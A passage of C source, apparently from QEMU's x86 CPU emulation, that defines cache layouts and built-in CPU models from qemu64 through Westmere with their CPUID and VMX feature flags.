host_cpuid(0x1, 0, &eax, &ebx, &ecx, &edx); if (family) { *family = ((eax >> 8) & 0x0F) + ((eax >> 20) & 0xFF); } if (model) { *model = ((eax >> 4) & 0x0F) | ((eax & 0xF0000) >> 12); } if (stepping) { *stepping = eax & 0x0F; } } typedef struct PropValue { const char *prop, *value; } PropValue; typedef struct X86CPUVersionDefinition { X86CPUVersion version; const char *alias; const char *note; PropValue *props; } X86CPUVersionDefinition; /* Base definition for a CPU model */ typedef struct X86CPUDefinition { const char *name; uint32_t level; uint32_t xlevel; /* vendor is zero-terminated, 12 character ASCII string */ char vendor[CPUID_VENDOR_SZ + 1]; int family; int model; int stepping; FeatureWordArray features; const char *model_id; CPUCaches *cache_info; /* Use AMD EPYC encoding for apic id */ bool use_epyc_apic_id_encoding; /* * Definitions for alternative versions of CPU model. * List is terminated by item with version == 0. * If NULL, version 1 will be registered automatically. */ const X86CPUVersionDefinition *versions; } X86CPUDefinition; /* Reference to a specific CPU model version */ struct X86CPUModel { /* Base CPU definition */ X86CPUDefinition *cpudef; /* CPU model version */ X86CPUVersion version; const char *note; /* * If true, this is an alias CPU model. * This matters only for "-cpu help" and query-cpu-definitions */ bool is_alias; }; static CPUCaches epyc_cache_info = { .l1d_cache = &(CPUCacheInfo) { .type = DATA_CACHE, .level = 1, .size = 32 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 64, .lines_per_tag = 1, .self_init = 1, .no_invd_sharing = true, }, .l1i_cache = &(CPUCacheInfo) { .type = INSTRUCTION_CACHE, .level = 1, .size = 64 * KiB, .line_size = 64, .associativity = 4, .partitions = 1, .sets = 256, .lines_per_tag = 1, .self_init = 1, .no_invd_sharing = true, }, .l2_cache = &(CPUCacheInfo) { .type = UNIFIED_CACHE, .level = 2, .size = 512 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 1024, .lines_per_tag = 1, }, .l3_cache = &(CPUCacheInfo) { .type = UNIFIED_CACHE, .level = 3, .size = 8 * MiB, .line_size = 64, .associativity = 16, .partitions = 1, .sets = 8192, .lines_per_tag = 1, .self_init = true, .inclusive = true, .complex_indexing = true, }, }; static CPUCaches epyc_rome_cache_info = { .l1d_cache = &(CPUCacheInfo) { .type = DATA_CACHE, .level = 1, .size = 32 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 64, .lines_per_tag = 1, .self_init = 1, .no_invd_sharing = true, }, .l1i_cache = &(CPUCacheInfo) { .type = INSTRUCTION_CACHE, .level = 1, .size = 32 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 64, .lines_per_tag = 1, .self_init = 1, .no_invd_sharing = true, }, .l2_cache = &(CPUCacheInfo) { .type = UNIFIED_CACHE, .level = 2, .size = 512 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 1024, .lines_per_tag = 1, }, .l3_cache = &(CPUCacheInfo) { .type = UNIFIED_CACHE, .level = 3, .size = 16 * MiB, .line_size = 64, .associativity = 16, .partitions = 1, .sets = 16384, .lines_per_tag = 1, .self_init = true, .inclusive = true, .complex_indexing = true, }, }; /* The following VMX features are not supported by KVM and are left out in the * CPU definitions: * * Dual-monitor support (all processors) * Entry to SMM * Deactivate dual-monitor treatment * Number of CR3-target values * Shutdown activity state * Wait-for-SIPI activity state * PAUSE-loop exiting (Westmere and newer) * EPT-violation #VE (Broadwell and newer) * Inject event with insn length=0 (Skylake and newer) * Conceal non-root operation from PT * Conceal VM exits from PT * Conceal VM entries from PT * Enable ENCLS exiting * Mode-based execute control (XS/XU) s TSC scaling (Skylake Server and newer) * GPA translation for PT (IceLake and newer) * User wait and pause * ENCLV exiting * Load IA32_RTIT_CTL * Clear IA32_RTIT_CTL * Advanced VM-exit information for EPT violations * Sub-page write permissions * PT in VMX operation */ static X86CPUDefinition builtin_x86_defs[] = { { .name = "qemu64", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 6, .model = 6, .stepping = 3, .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36, .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_CX16, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM, .xlevel = 0x8000000A, .model_id = "QEMU Virtual CPU version " QEMU_HW_VERSION, }, { .name = "phenom", .level = 5, .vendor = CPUID_VENDOR_AMD, .family = 16, .model = 2, .stepping = 3, /* Missing: CPUID_HT */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36 | CPUID_VME, .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_CX16 | CPUID_EXT_POPCNT, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX | CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT | CPUID_EXT2_MMXEXT | CPUID_EXT2_FFXSR | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP, /* Missing: CPUID_EXT3_CMP_LEG, CPUID_EXT3_EXTAPIC, CPUID_EXT3_CR8LEG, CPUID_EXT3_MISALIGNSSE, CPUID_EXT3_3DNOWPREFETCH, CPUID_EXT3_OSVW, CPUID_EXT3_IBS */ .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | CPUID_EXT3_ABM | CPUID_EXT3_SSE4A, /* Missing: CPUID_SVM_LBRV */ .features[FEAT_SVM] = CPUID_SVM_NPT, .xlevel = 0x8000001A, .model_id = "AMD Phenom(tm) 9550 Quad-Core Processor" }, { .name = "core2duo", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 15, .stepping = 11, /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36 | CPUID_VME | CPUID_ACPI | CPUID_SS, /* Missing: CPUID_EXT_DTES64, CPUID_EXT_DSCPL, CPUID_EXT_EST, * CPUID_EXT_TM2, CPUID_EXT_XTPR, CPUID_EXT_PDCM, CPUID_EXT_VMX */ .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES, .xlevel = 0x80000008, .model_id = "Intel(R) Core(TM)2 Duo CPU T7700 @ 2.40GHz", }, { .name = "kvm64", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 15, .model = 6, .stepping = 1, /* Missing: CPUID_HT */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_VME | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36, /* Missing: CPUID_EXT_POPCNT, CPUID_EXT_MONITOR */ .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_CX16, /* Missing: CPUID_EXT2_PDPE1GB, CPUID_EXT2_RDTSCP */ .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, /* Missing: CPUID_EXT3_LAHF_LM, CPUID_EXT3_CMP_LEG, CPUID_EXT3_EXTAPIC, CPUID_EXT3_CR8LEG, CPUID_EXT3_ABM, CPUID_EXT3_SSE4A, CPUID_EXT3_MISALIGNSSE, CPUID_EXT3_3DNOWPREFETCH, CPUID_EXT3_OSVW, CPUID_EXT3_IBS, CPUID_EXT3_SVM */ .features[FEAT_8000_0001_ECX] = 0, /* VMX features from Cedar Mill/Prescott */ .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING, .xlevel = 0x80000008, .model_id = "Common KVM processor" }, { .name = "qemu32", .level = 4, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 6, .stepping = 3, .features[FEAT_1_EDX] = PPRO_FEATURES, .features[FEAT_1_ECX] = CPUID_EXT_SSE3, .xlevel = 0x80000004, .model_id = "QEMU Virtual CPU version " QEMU_HW_VERSION, }, { .name = "kvm32", .level = 5, .vendor = CPUID_VENDOR_INTEL, .family = 15, .model = 6, .stepping = 1, .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_VME | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36, .features[FEAT_1_ECX] = CPUID_EXT_SSE3, .features[FEAT_8000_0001_ECX] = 0, /* VMX features from Yonah */ .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_USE_MSR_BITMAPS, .xlevel = 0x80000008, .model_id = "Common 32-bit KVM processor" }, { .name = "coreduo", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 14, .stepping = 8, /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_VME | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_ACPI | CPUID_SS, /* Missing: CPUID_EXT_EST, CPUID_EXT_TM2 , CPUID_EXT_XTPR, * CPUID_EXT_PDCM, CPUID_EXT_VMX */ .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_MONITOR, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_NX, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_USE_MSR_BITMAPS, .xlevel = 0x80000008, .model_id = "Genuine Intel(R) CPU T2600 @ 2.16GHz", }, { .name = "486", .level = 1, .vendor = CPUID_VENDOR_INTEL, .family = 4, .model = 8, .stepping = 0, .features[FEAT_1_EDX] = I486_FEATURES, .xlevel = 0, .model_id = "", }, { .name = "pentium", .level = 1, .vendor = CPUID_VENDOR_INTEL, .family = 5, .model = 4, .stepping = 3, .features[FEAT_1_EDX] = PENTIUM_FEATURES, .xlevel = 0, .model_id = "", }, { .name = "pentium2", .level = 2, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 5, .stepping = 2, .features[FEAT_1_EDX] = PENTIUM2_FEATURES, .xlevel = 0, .model_id = "", }, { .name = "pentium3", .level = 3, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 7, .stepping = 3, .features[FEAT_1_EDX] = PENTIUM3_FEATURES, .xlevel = 0, .model_id = "", }, { .name = "athlon", .level = 2, .vendor = CPUID_VENDOR_AMD, .family = 6, .model = 2, .stepping = 3, .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_PSE36 | CPUID_VME | CPUID_MTRR | CPUID_MCA, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_MMXEXT | CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT, .xlevel = 0x80000008, .model_id = "QEMU Virtual CPU version " QEMU_HW_VERSION, }, { .name = "n270", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 28, .stepping = 2, /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_VME | CPUID_ACPI | CPUID_SS, /* Some CPUs got no CPUID_SEP */ /* Missing: CPUID_EXT_DSCPL, CPUID_EXT_EST, CPUID_EXT_TM2, * CPUID_EXT_XTPR */ .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_MOVBE, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .xlevel = 0x80000008, .model_id = "Intel(R) Atom(TM) CPU N270 @ 1.60GHz", }, { .name = "Conroe", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 15, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES, .xlevel = 0x80000008, .model_id = "Intel Celeron_4x0 (Conroe/Merom Class Core 2)", }, { .name = "Penryn", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 23, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING, .xlevel = 0x80000008, .model_id = "Intel Core 2 Duo P9xxx (Penryn Class Core 2)", }, { .name = "Nehalem", .level = 11, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 26, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS | VMX_PIN_BASED_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_CR3_LOAD_EXITING | VMX_CPU_BASED_CR3_STORE_EXITING | VMX_CPU_BASED_MONITOR_TRAP_FLAG | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES | VMX_SECONDARY_EXEC_WBINVD_EXITING | VMX_SECONDARY_EXEC_ENABLE_EPT | VMX_SECONDARY_EXEC_DESC | VMX_SECONDARY_EXEC_RDTSCP | VMX_SECONDARY_EXEC_VIRTUALIZE_X2APIC_MODE | VMX_SECONDARY_EXEC_ENABLE_VPID, .xlevel = 0x80000008, .model_id = "Intel Core i7 9xx (Nehalem Class Core i7)", .versions = (X86CPUVersionDefinition[]) { { .version = 1 }, { .version = 2, .alias = "Nehalem-IBRS", .props = (PropValue[]) { { "spec-ctrl", "on" }, { "model-id", "Intel Core i7 9xx (Nehalem Core i7, IBRS update)" }, { NULL /* end of list */ } } }, { 0 /* end of list */ } } }, { .name = "Westmere", .level = 11, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 44, .stepping = 1, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_AES | CPUID_EXT_POPCNT | CPUID_EXT_SSE42 | CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_PCLMULQDQ | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_6_EAX] = CPUID_6_EAX_ARAT, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS | MSR_VMX_BASIC_TRUE_CTLS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE | VMX_VM_ENTRY_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_ENTRY_LOAD_IA32_PAT | VMX_VM_ENTRY_LOAD_DEBUG_CONTROLS | VMX_VM_ENTRY_LOAD_IA32_EFER, .features[FEAT_VMX_EPT_VPID_CAPS] = MSR_VMX_EPT_EXECONLY | MSR_VMX_EPT_PAGE_WALK_LENGTH_4 | MSR_VMX_EPT_WB | MSR_VMX_EPT_2MB | MSR_VMX_EPT_1GB | MSR_VMX_EPT_INVEPT | MSR_VMX_EPT_INVEPT_SINGLE_CONTEXT | MSR_VMX_EPT_INVEPT_ALL_CONTEXT | MSR_VMX_EPT_INVVPID | MSR_VMX_EPT_INVVPID_SINGLE_ADDR | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT | MSR_VMX_EPT_INVVPID_ALL_CONTEXT | MSR_VMX_EPT_INVVPID_SINGLE_CONTEXT_NOGLOBALS, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT | VMX_VM_EXIT_SAVE_DEBUG_CONTROLS | VMX_VM_EXIT_LOAD_IA32_PERF_GLOBAL_CTRL | VMX_VM_EXIT_LOAD_IA32_PAT | VMX_VM_EXIT_LOAD_IA32_EFER | VMX_VM_EXIT_SAVE_IA32_PAT | VMX_VM_EXIT_SAVE_IA32_EFER | VMX_VM_EXIT_SAVE_VMX_PREEMPTION_TIMER, .features[FEAT_VMX_MISC] = 